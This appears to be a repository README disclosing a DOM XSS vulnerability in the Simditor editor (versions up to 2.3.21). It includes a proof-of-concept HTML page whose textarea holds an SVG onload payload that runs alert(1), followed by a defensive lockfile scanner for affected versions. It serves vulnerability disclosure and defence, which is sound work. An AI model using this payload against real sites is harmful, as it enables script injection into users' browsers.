
hkglue/simditor_dom_xss

simditor

https://github.com/mycolorway/simditor DOM XSS

Download the Simditor source code (<= 2.3.21).

We just need these three JS files.

Edit an HTML file:

<html>
<title>test</title>
<body>
<script type="text/javascript" src="./jquery.min.js"></script>
<script type="text/javascript" src="./module.js"></script>
<script type="text/javascript" src="./hotkeys.js"></script>
<script type="text/javascript" src="./simditor.js"></script>

<textarea id="editor"><svg><svg/onload=alert(1)></textarea>
<script>var editor = new Simditor({textarea: $('#editor')});</script>

</body>
</html>

Open the HTML in any browser.

This is in my Chrome; the XSS payload is executed!
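
A defender-side check that follows from the affected range above (added example, not part of the original repository or the Simditor project): scan a parsed package-lock.json for Simditor at version <= 2.3.21. It assumes the editor is installed from npm under the package name `simditor`; `findSimditor`, `isAffected` and the sample lockfile are constructed for illustration.

```javascript
const AFFECTED_MAX = [2, 3, 21]; // upper bound taken from the page

// Parse "2.3.21" or "v2.3.21-rc.1" into [major, minor, patch]; null if unparseable.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  return m ? m.slice(1, 4).map(Number) : null;
}

// True when version <= AFFECTED_MAX. Unparseable versions are flagged (fail closed).
function isAffected(version) {
  const p = parseVersion(version);
  if (!p) return true;
  for (let i = 0; i < 3; i++) {
    if (p[i] !== AFFECTED_MAX[i]) return p[i] < AFFECTED_MAX[i];
  }
  return true; // exactly 2.3.21
}

// Collect every simditor entry from a parsed package-lock.json.
// lockfileVersion 2/3 uses "packages" keyed by install path; version 1 nests "dependencies".
function findSimditor(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === "node_modules/simditor" || path.endsWith("/node_modules/simditor")) {
      hits.push({ where: path, version: meta.version });
    }
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const where = trail ? trail + " > " + name : name;
      if (name === "simditor") hits.push({ where, version: meta.version });
      walk(meta.dependencies, where);
    }
  };
  if (!lock.packages) walk(lock.dependencies, "");
  return hits.map((h) => ({ ...h, affected: isAffected(h.version) }));
}

// Constructed sample lockfile (not taken from any real project).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/simditor": { version: "2.3.6" },
    "node_modules/cms-widget/node_modules/simditor": { version: "2.3.22" },
  },
};

console.log(findSimditor(SAMPLE_LOCK));
```

A lockfile scan does not see copies of simditor.js placed next to a page by hand, as the test page above does; those have to be found by searching the served files.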
